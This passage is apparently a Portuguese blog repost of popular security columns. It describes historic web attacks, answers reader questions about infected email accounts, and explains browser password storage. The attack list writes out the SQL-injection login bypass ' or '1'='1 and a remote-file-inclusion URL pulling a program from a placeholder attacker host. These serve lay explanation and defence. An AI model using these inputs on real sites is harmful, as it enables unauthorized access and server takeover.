Por algum motivo, o FrontPage enviava para o site um arquivo contendo a senha de administrador. O arquivo sempre ficava disponível no mesmo endereço. Para hackear o site, bastava verificar se o arquivo existia, baixá-lo e quebrar a proteção usada para guardar a senha.
A brecha foi muito usada no final dos anos 90. Para resolver o problema, bastaria impedir a leitura do arquivo.
5. Injeção SQL clássicaDiante de uma tela de login e senha, o hacker coloca os seguintes valores, tanto no usuário como na senha: ‘ or ’1′=’1
Essa sequência de apenas 11 caracteres interage com uma linguagem chamada de SQL, que é usada para consultas em bancos de dados. Funciona da seguinte forma: o usuário e a senha digitados no formulário precisam ser pesquisados no banco de dados: “existe um usuário ‘tal’ com a senha ‘tal’?”. E o programa precisa usar aspas simples para definir ‘tal’ e ‘tal’, de modo a diferenciar o argumento (‘tal’) da consulta (existe um usuário…).
Ao colocar aspas simples no formulário de login, o hacker quebra a lógica da pesquisa e o restante deixa de ser um valor a ser consultado, ou seja, o banco de dados não vai procurar por um usuário com aquele nome, mas interpretar aquilo que foi digitado como parte da consulta. Aqui começa a mágica: “or” é a palavra em inglês que significa “ou” e altera a lógica da “pergunta” que o banco de dados recebe. Com isso, a consulta final enviada ao banco de dados é: “existe um usuário ” ou ’1′=’1′, com senha ” ou ’1′=’1′?”
Como 1 sempre vai ser igual a 1 (1=1), o banco de dados retornará todos os usuários existentes no sistema. Como o software entende que apenas um usuário está se logando, ele vai usar o primeiro resultado presente no banco de dados – que geralmente é o usuário administrativo.
O resultado disso é um acesso completo ao sistema, sem precisar ter conhecimento do usuário e da senha.
Softwares protegidos contra essa falha impedem que as aspas simples sejam enviadas ao comando do banco de dados e também verificam se mais de um usuário foi retornado pela consulta – algo que nunca deve ocorrer.
6. Inclusão de Arquivo Remoto (Remote File Inclusion – RFI)Por acaso você já viu algum site que usa endereços do tipo index.php?conteudo=precos.php? Nesse tipo de site, a parte “conteudo=precos.php” é especial, porque significa que o programa está buscando o valor de “conteudo” para carregar um arquivo (que nesse caso é precos.php). O valor “conteudo” pode ser qualquer coisa, como “inc=”, “area=” e por aí vai.
Tudo o que o hacker faz é substituir o valor, acessando algo como: “index.php?conteudo=http://sitedohacker.inv/programa-especial.php“. Com isso, a página carregará oprograma-especial.php a partir do site do hacker. Esse programa poderá realizar a alteração (desfigurar) a página, ou mesmo dar o controle do servidor ao hacker. O hacker não precisa saber desenvolver esse programa especial, porque é possível encontrá-lo pronto na internet. Há diversos “sabores” – basta escolher.
Sites imunes a essa falha só carregam nomes e endereços autorizados dentro do código, ou seja, o programa entenderá que “conteudo” tem um valor inválido e ignorá-lo. Para evitar que clientes sejam invadidos, provedores de hospedagem costumam impedir o carregamento de endereços de internet dentro do código dos sites, protegendo dessa forma até mesmo os sites vulneráveis de ataque. Durante muito tempo, porém, essa falha permitiu a invasão de muitos sites e bastava colocar um endereço certo no navegador web para ativá-la.
7. Senha padrão
Ao configurar um site ou sistema, o administrador deixa a mesma senha que veio configurada de fábrica. Tudo o que hacker precisa fazer é consultar o manual de instruções do software ou hardware, checar a senha padrão e tentá-la. Se der certo, a invasão está concluída.
Ao configurar um site ou sistema, o administrador deixa a mesma senha que veio configurada de fábrica. Tudo o que hacker precisa fazer é consultar o manual de instruções do software ou hardware, checar a senha padrão e tentá-la. Se der certo, a invasão está concluída.
Hoje, muitos softwares geram senhas aleatórias durante sua instalação. Já equipamentos de hardware podem utilizar uma senha diferente para cada produto, baseada no número de série ou outro identificador que estiver disponível. Muitas invasões, porém, se deram com o usuário e senha “admin/admin”.
8. MDAC no Internet ExplorerO Windows, como sistema operacional, permite que administradores de sistema e programadores criem pequenos softwares, chamados de “scripts”. Esses scripts podem ter diversas funções, entre elas apagar, criar ou fazer download de arquivos.
Por erro, uma das funções responsáveis por manipular arquivos ficou acessível dentro do Internet Explorer no escopo da internet. Então, para infectar um computador, bastava ao site “pedir” ao Internet Explorer para baixar e executar um programa, e o navegador faria isso sem desconfiar de nada.
Normalmente, códigos que exploram vulnerabilidades não são nada bonitos, pois estão operando dentro de alguma condição de erro de um software. Não era o caso dessa falha. Como ela usava um recurso do próprio sistema, ela funcionava 100% do tempo, sem nenhum imprevisto.
Por esse motivo, essa vulnerabilidade foi largamente usada, especialmente por hackers brasileiros, e ainda pode ser vista em alguns “kits” de ataque na web, mesmo sendo antiga. Como é uma das falhas mais “limpas”, não faz sentido deixar de usá-la se o computador da vítima estiver vulnerável.
9. WMFO WMF é um formato de arquivo de imagem antigo, criado no início da década de 90 para o Windows 3.0. Como na ocasião os computadores tinham poucos recursos, o WMF permitia “acelerar” coisas, tendo uma função para executar código no sistema, como se fosse programa, e não uma imagem. O formato foi esquecido, chegou a ser abandonado no Windows 2000, mas foi reintroduzido no Windows XP. Quando criminosos descobriram que bastava carregar uma imagem para executar um programa no Windows, a festa estava pronta.
Foi uma falha tão absurda que algumas pessoas chegaram a levantar a hipótese de que a Microsoft teria deixado isso como “porta dos fundos” para burlar a segurança do sistema. O principal defensor dessa teoria era o polêmico especialista Steve Gibson. A explicação mais simples, porém, é que ninguém se lembrava do recurso, e que ele foi colocado no Windows XP sem as devidas considerações de segurança.
Pacotão: o que fazer quando contatos recebem e-mail com vírus?
qui, 22/08/13
por Altieres Rohr |
categoria Coluna
Se você tem alguma dúvida sobre segurança da informação (antivírus, invasões, cibercrime, roubo de dados etc.) vá até o fim da reportagem e utilize a seção de comentários. A coluna responde perguntas deixadas por leitores todas as quintas-feiras.
>>> E-mail enviando vírus
Meu email manda vírus pra todo mundo da minha lista. Já troquei a senha e não adiantou. O que devo fazer?
André
André, a primeira questão é se estes e-mails estão mesmo vindo de sua conta de e-mail. Como não existe verificação de remetente em e-mail, o criminoso pode continuar enviando e-mail como se fosse você aos seus contatos, mesmo que não tenha mais acesso à sua conta. Se ele já teve acesso uma vez, pode usar a lista de contatos e com isso continuar enviando os e-mails.
Outro detalhe é que, além do acesso à própria conta de e-mail, é possível que seu computador esteja infectado com um vírus.
Não se esqueça também de trocar a resposta secreta e, se disponível, ative a autenticação de dois fatores (via SMS) em seu serviço de e-mail.
>>> Mais e-mail com vírus
Olá, meu e-mail está com vírus, pois ele envia e-mails aos meus contatos (inclusive para mim, já que envio e-mails para mim mesmo com frequência, para guardar arquivos); porém não consigo encontrar um antivírus que consiga analisar meu e-mail para encontrar o vírus, então gostaria de saber se existe um programa confiável que possa retirar esse vírus do meu e-mail.
Obrigado.
Arthur
Olá, meu e-mail está com vírus, pois ele envia e-mails aos meus contatos (inclusive para mim, já que envio e-mails para mim mesmo com frequência, para guardar arquivos); porém não consigo encontrar um antivírus que consiga analisar meu e-mail para encontrar o vírus, então gostaria de saber se existe um programa confiável que possa retirar esse vírus do meu e-mail.
Obrigado.
Arthur
Nenhum antivírus poderá analisar seu e-mail, Arthur. O antivírus faz isso quando você abre uma mensagem: nesse momento ele verifica se aquela mensagem específica está infectada. Mas é só isso.
No mais, vale o mesmo que foi dito acima para o André: é preciso trocar a senha, resposta secreta e avaliar se os e-mails estão realmente partindo da sua conta de e-mail. Pode muito bem ser o caso que seu endereço de e-mail esteja apenas sendo usado pelos criminosos.
>>> Copiando e colando
Normalmente eu copio e colo (de um bloco de notas) o número da agência e da conta.
Isso garante uma segurança extra contra esses programas que capturam teclado?
Luiz Alberto
Não, Luiz. Evitar digitar a conta ou sua senha não vai lhe ajudar a impedir a captura das senhas. Muitas das pragas digitais que roubam senhas monitoram os campos de formulário do navegador. Desse modo, não importa como os dados foram colocados no formulário, apenas aquilo que foi enviado.
Em outros casos, o código é capaz de monitorar a área de transferência (onde fica o conteúdo do que é copiado e colado).
>>> Endereço real do endereço IP
Olá! Gostaria da ajuda de vocês: quando coloco o nº do meu IP em alguns sites que mostram de onde ele vem, em vez de aparecer o endereço da minha casa aparece o endereço de uma pessoa que conheço. É possível que esta pessoa esteja me hackeando/acessando meu computador? Como posso me proteger disto? (Obs.: mesmo mudando nº de IP o problema continua).
Fabíola
Olá! Gostaria da ajuda de vocês: quando coloco o nº do meu IP em alguns sites que mostram de onde ele vem, em vez de aparecer o endereço da minha casa aparece o endereço de uma pessoa que conheço. É possível que esta pessoa esteja me hackeando/acessando meu computador? Como posso me proteger disto? (Obs.: mesmo mudando nº de IP o problema continua).
Fabíola
Não, Fabíola. O endereço físico, do “mundo real”, ligado a um endereço IP pertence ao provedor de acesso, que é o “dono” daquele endereço IP. Quando um provedor de acesso usa determinados endereços para uma cidade ou região, esses serviços de “geolocalização”, como são chamados, exibem essa região aproximada. Isso, claro, se souberem como o provedor usa aquele endereço. Às vezes, a informação está completamente equivocada.
O endereço só vai ser 100% correto em alguns casos. Exemplo: você está acessando de uma universidade que tem endereços próprios e esses endereços foram registrados para o campus da instituição de onde você está acessando.
>>> E-mail e senha
Sempre que vamos preencher cadastros a maioria dos sites pede para colocarmos o email que acho normal, mas depois pede a senha. Aí eu fico preocupado: tem como eles saberem a senha? Obrigado.
Jose Aldo
Sempre que vamos preencher cadastros a maioria dos sites pede para colocarmos o email que acho normal, mas depois pede a senha. Aí eu fico preocupado: tem como eles saberem a senha? Obrigado.
Jose Aldo
José, a “senha” de cadastro pedida pelos sites é uma senha específica para aquele site, não a senha do seu e-mail. O ideal é usar uma senha diferente para cada site ou serviço, porque é sim possível que aquele site tenha acesso à senha. Embora as senhas não sejam normalmente armazenadas em formato legível, toda vez que você preenche sua senha no site ela está legível, portanto pode ser vista pelo responsável pelo site.
Por esses e outros motivos, o ideal é sempre usar uma senha diferente. Especialmente seu endereço de e-mail deve estar protegido com uma senha que você não utiliza em nenhum outro lugar.
O pacotão da coluna Segurança Digital vai ficando por aqui. Não se esqueça de deixar sua dúvida na área de comentários, logo abaixo. Até a próxima!
Qual a segurança de uma senha armazenada no navegador web?
ter, 20/08/13
por Altieres Rohr |
categoria Coluna
Se você tem alguma dúvida sobre segurança da informação (antivírus, invasões, cibercrime, roubo de dados etc.), vá até o fim da reportagem e utilize a seção de comentários. A coluna responde perguntas deixadas por leitores todas as quintas-feiras.
Quando preenchemos um formulário de login na web, o navegador questiona se queremos armazenar a combinação de usuário e senha para não termos de preencher isso no futuro. Em muitos casos, os próprios sites também oferecem o recurso “lembrar de mim” para que o login não precise ser feito novamente. Você sabia que as senhas armazenadas com esses recursos, ou mesmo a função de “lembrar”, podem ser facilmente acessadas por quem tiver acesso ao seu computador e navegador – e que isso não é um problema?
Muitos internautas ficaram surpresos com uma revelação recente de que o Google Chrome possui um botão para mostrar todas as senhas armazenadas. Mas o Firefox também possui o mesmo botão. E os navegadores que não possuem esse recurso apenas escondem as senhas, mas elas ainda estão lá e podem ser facilmente resgatadas com as ferramentas certas.
O recurso “lembrar de mim” também funciona da mesma forma. Quando ele é usado, o site cria um identificador permanente, que é armazenado pelo navegador e reenviado quando a página for acessada. Nesse momento, o site saberá imediatamente qual é o usuário que está entrando no site. Mas nada impede que esse mesmo identificador presente no PC seja copiado e usado em outro computador no lugar da senha de acesso. Esse ataque é conhecido como “roubo de cookie”.
O detalhe é que nada disso deveria ser surpreendente. Pense da seguinte forma: se você entra em seu Facebook, deixa o navegador aberto e abandona o computador, é óbvio que a pessoa que usá-lo em seguida poderá ver a página que foi deixada aberta. O roubo das senhas e dos identificadores de acesso é apenas uma extensão permanente dessa situação: o acesso já foi dado quando a pessoa usou o navegador.
Embora existam alguns recursos de “segurança” para dificultar o acesso aos dados, como o uso de uma senha-mestra no Firefox, eles não eliminam a essência do problema. Ainda é perfeitamente possível roubar os identificadores de acesso ou mesmo as senhas, uma vez que a senha-mestra já tenha sido digitada e, claro, acessar os sites que já estiverem “logados”.
Na prática, esse não é um problema que o navegador de internet precisa ou mesmo pode resolver. Esse é um problema do sistema operacional. E é por isso que todos os sistemas possuem um recurso de “bloqueio de tela”, que impede o uso do computador sem que a senha de login seja digitada.
No Windows, a tela de bloqueio pode ser facilmente ativada com a combinação tecla Windows+L. Caso a tela esteja bloqueada, quem for acessar o computador ainda pode usar o recurso de “trocar usuário” e escolher um usuário diferente. É por esse motivo que o Windows possui uma conta de “usuário convidado”, configurada no Painel de Controle.
Tentar proteger as senhas ou o navegador de alguém que já está com acesso ao sistema é uma batalha perdida, embora o impacto – que alguém possa ler todas as suas senhas e acessar todos os sites em qual seu navegador está autorizado – pareça um pouco extremo. No entanto, é preciso criar o hábito de bloquear a tela e compreender que sistemas dispõem de diversos usuários porque os próprios aplicativos dependem dessa separação para fornecer com segurança os recursos que possuem – inclusive, aí, o armazenamento das senhas.
Ou seja, o navegador faz parte de um ambiente maior (o sistema) e sua segurança precisa ser pensada nesse ambiente. O mesmo vale para celulares: se você não está usando um código de bloqueio, é natural que qualquer um que pegue seu celular possa acessar tudo que nele estiver armazenado ou configurado.
O uso de senhas de bloqueio e de usuários distintos quando o computador for usado por mais de uma pessoa são importantíssimos – a segurança dos softwares é pensada a partir desse ponto de partida. Se você não fizer uso desses recursos, lembrar qualquer senha ou acesso, em qualquer lugar, é extremamente perigoso.
Nenhum comentário:
Postar um comentário